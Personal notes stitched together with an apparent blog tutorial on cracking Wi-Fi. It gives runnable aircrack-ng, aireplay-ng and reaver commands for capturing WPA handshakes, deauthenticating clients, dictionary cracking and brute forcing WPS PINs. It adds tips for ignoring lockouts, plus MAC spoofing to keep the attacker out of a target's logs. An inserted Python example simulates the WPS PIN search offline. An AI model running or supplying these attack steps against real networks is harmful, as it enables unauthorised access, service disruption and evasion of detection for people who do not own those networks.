Disclaimer: this info is shared for educational purposes only. I don't take any responsibility if any person/org uses it to intentionally harm anyone.
This is less a tutorial and more my personal notes from studying wireless security.
Things you need: Kali Linux, the Aircrack-ng suite (NO EXCEPTIONS)
1. Bring the interface down so it is not connected to any network
ifconfig wlan0 down
2. Put wlan0 into monitor mode; the result is a new interface mon0, mon1... mon# (newer airmon-ng releases name it wlan0mon instead; use whatever name airmon-ng prints in the commands below)
airmon-ng start wlan0
3. Change the MAC on the monitor interface (optional, but on an engagement you don't want your real hardware address sitting in the target's logs)
ifconfig mon0 down
macchanger -r mon0   # assigns a random MAC address to the monitor interface
ifconfig mon0 up
4. Check that you got a new MAC address
ifconfig mon0
5. Capture on a specific channel (here channel 11)
airodump-ng mon0 -c 11
6. Start the packet capture and write it to a file
airodump-ng -w H6762 --bssid BC:CA:B5:39:67:60 -c 11 --ivs mon0
-w fileName  prefix for the output files (airodump-ng appends -01, -02, ... on each run)
--bssid  the AP's MAC address
-c  channel number
--ivs  write only initialization vectors (and a WPA handshake record once airodump-ng detects one) instead of full frames, so the dump file stays small; for WPA cracking it is safer to drop --ivs and keep the full .cap, which retains the raw EAPOL frames for other tools
mon0  your monitoring interface
7. Check packet injection
aireplay-ng -9 -e HOME-6762 -a BC:CA:B5:39:67:60 mon0
8. Deauthenticate the client so it reconnects and we capture the handshake between client and AP
aireplay-ng --deauth 5 -a BC:00:B5:00:67:60 -c 84:00:A5:30:F0:00 mon0
--deauth  number of deauth packets to send
-a  access point (AKA the router)
-c  client or station
9. Start the dictionary attack to crack the handshake captured in the previous step
aircrack-ng H6762-02.ivs -w /usr/share/wordlists/rockyou.txt
(The filename is whatever airodump-ng wrote for the -w prefix above; the numeric suffix increases on every run.)
Yes, if the passphrase is in the wordlist it will be cracked 100% of the time; if it isn't, no amount of waiting helps. There are bigger wordlists that go up to 15 GB uncompressed.
Please keep in mind that brute force can take a lot of time: every candidate costs 4096 rounds of PBKDF2-HMAC-SHA1, so a home CPU gets through only thousands of candidates per second per core. In my opinion it's not a practical approach for home users to crack a decent passphrase with their home computer. No offense.
Cracking WPS security the Reaver way
wash -i mon0   # lists nearby APs that advertise WPS, with channel and lock state
reaver -i mon0 --channel 1 --essid SOME-2452 --bssid F8:EE:A5:WW:FF:50 -vv
A little description of WPS and why it is so much easier to brute force:
An 8-digit PIN using 0-9 gives 10 to the 8th possible combinations (100,000,000).
However, the 8th digit isn't really part of the PIN; it is just a checksum of the other 7, so the total is 10 to the 7th (10,000,000).
WPS also verifies the PIN in two halves: the AP replies to M4 with a NACK if the first 4 digits are wrong, and to M6 with a NACK if the last 4 are wrong. So the attacker first finds the correct first half and only then works on the second half.
Don't forget the second half includes the checksum digit, so really it's just 3 free digits in the second half.
The correct total for WPS is 10 to the 4th + 10 to the 3rd = 11,000: the first half has 10,000 possible combinations and the second half just 1,000.
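The arithmetic above, plus the half-by-half search it makes possible, as an added Python example (not code from these notes, nor from reaver). The Registrar class is a constructed stand-in for the AP that answers the way the real M4/M6 exchange leaks information; nothing is sent over the air, and the example PIN 12345670 is the one used in the WPS specification.

```python
"""WPS PIN checksum and the split brute force that Reaver relies on.

Added example; not code from the page, reaver or aircrack-ng. Registrar is a
constructed oracle standing in for an AP; no network traffic is involved.
"""


def wps_checksum(first7: int) -> int:
    """Checksum (8th) digit for a 7-digit PIN body, per the Wi-Fi Simple
    Configuration spec: weight the digits 3,1,3,1,3,1,3 and complement mod 10."""
    accum, n = 0, first7
    for weight in (3, 1, 3, 1, 3, 1, 3):  # walked from the least significant digit
        accum += weight * (n % 10)
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class Registrar:
    """Constructed oracle. A real AP replies with a NACK after M4 when the
    first half of the PIN is wrong and after M6 when the second half is wrong."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK_AFTER_M4"
        if pin[4:] != self.pin[4:]:
            return "NACK_AFTER_M6"
        return "OK"


def split_bruteforce(reg: Registrar) -> str:
    """Recover the PIN in at most 10_000 + 1_000 attempts instead of 10_000_000."""
    first_half = None
    for a in range(10_000):                      # phase 1: only the first half matters
        seven = f"{a:04d}000"                    # second half is a placeholder
        if reg.try_pin(seven + str(wps_checksum(int(seven)))) != "NACK_AFTER_M4":
            first_half = f"{a:04d}"
            break
    if first_half is None:
        raise RuntimeError("no first half accepted; oracle is not behaving like WPS")
    for b in range(1_000):                       # phase 2: 3 free digits, checksum fixed
        seven = first_half + f"{b:03d}"
        pin = seven + str(wps_checksum(int(seven)))
        if reg.try_pin(pin) == "OK":
            return pin
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    reg = Registrar("12345670")                  # the spec's example PIN
    print(split_bruteforce(reg), "after", reg.attempts, "attempts")
```

Against PIN 12345670 the search succeeds after 1,803 attempts; a PIN of 99999995 forces the worst case and still finishes in exactly 11,000, which is the number the text arrives at.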
Small DH keys (--dh-small, -S) will speed it up. My lab gives me 22-90 seconds per pin on routers with updated firmware, 2-3 seconds on old firmware.
Also note that even though the router says locked or shows no WPS, hit it anyway (-L, --ignore-locks) to verify, because my recent tests show some are unlocked yet flagging themselves as locked.
What I used last.
"reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3   # -r 2:199  # if you are getting locked out too much, add that; it may help"
-a  Auto-select some advanced options for the target AP.
-S  Use small Diffie-Hellman keys (reduces strain on the router and increases speed).
-N  No NACKs (don't send NACKs for out-of-order packets); just speeds things up a bit.
-E  Terminate each pin attempt with an EAP FAIL, so it may trick the router into thinking the attempt failed and let you try more before it locks.
-d  Delay between pin attempts in seconds (the default is 1 second).
-r x:y  Recurring delay: sleep for y seconds every x pin attempts.
Forgot the key for your own Wi-Fi? No problem. In this blog I will show you how to recover it. Remember, this is to be used only on your own network and for educational purposes.
First, know right now that the wifi card built into your computer will almost certainly not work, and neither will the one in your phone. You need an external adapter with a chipset whose driver supports monitor mode and packet injection.
I recommend one of these:
These external adapters attach to a laptop (or to a phone via an OTG dongle) and have all the hardware you need.
Next you will need to be running Kali Linux. If you need help setting that up, I recommend my blog post on how to make an Excalibur USB stick with Kali on it.
Here are the basic steps we will be going through:
- 0. Install the latest aircrack-ng
- 1. Start the wireless interface in monitor mode using airmon-ng
- 2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
- 3. [Optional] Use aireplay-ng to deauthenticate the wireless client
- 4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake
0. Install the Latest Aircrack-ng
Install the required dependencies :
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Download and install the latest aircrack-ng :
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc1
$ make
$ sudo make install
Be sure to check that the version of aircrack-ng is up to date, because you may see problems with older versions. 1.2-rc1 is itself an old release by now; on a current Kali, apt install aircrack-ng gives you a newer one without building from source.
1. Start the Wireless Interface in Monitor Mode
Find and stop all processes that could cause trouble :
$ sudo airmon-ng check kill
Start the wireless interface in monitor mode :
$ sudo airmon-ng start wlan0
Notice that airmon-ng enabled monitor mode on mon0:
So, the correct interface name to use in later parts of the tutorial is mon0 (recent airmon-ng releases call it wlan0mon instead; substitute whatever name airmon-ng printed).
2. Start Airodump-ng to Collect Authentication Handshake
Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.
It can be done with the airodump-ng command:
$ sudo airodump-ng mon0
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :
Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in :
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Option | Description |
---|---|
-c | The channel for the wireless network |
--bssid | The MAC address of the access point |
-w | The file name prefix for the file which will contain authentication handshake |
mon0 | The wireless interface |
--ignore-negative-one | Removes the 'fixed channel : -1' message |
Now wait until airodump-ng captures a handshake… or go to the step #3 if you want to force this process.
After some time you'll notice WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.
3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client
This step is optional. If you can’t wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we’ll capture the authentication handshake.
Send DeAuth to broadcast :
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
Send directed DeAuth (the attack is more effective when it is targeted) :
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
Option | Description |
---|---|
--deauth 100 | The number of de-authenticate frames you want to send (0 for unlimited) |
-a | The MAC address of the access point |
-c | The MAC address of the client |
mon0 | The wireless interface |
--ignore-negative-one | Removes the 'fixed channel : -1' message |
4. Run Aircrack-ng to Crack WPA/WPA2-PSK
To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.
Crack the WPA/WPA2-PSK with the following command :
$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack-01.cap
Option | Description |
---|---|
-w | The name of the dictionary file |
-b | The MAC address of the access point |
WPAcrack-01.cap | The capture file that contains the authentication handshake (the -w prefix from step 2 plus the -01 suffix airodump-ng adds on the first run) |
If you would like video instruction, here is a hacker from SecureNinjaTV explaining how to do it.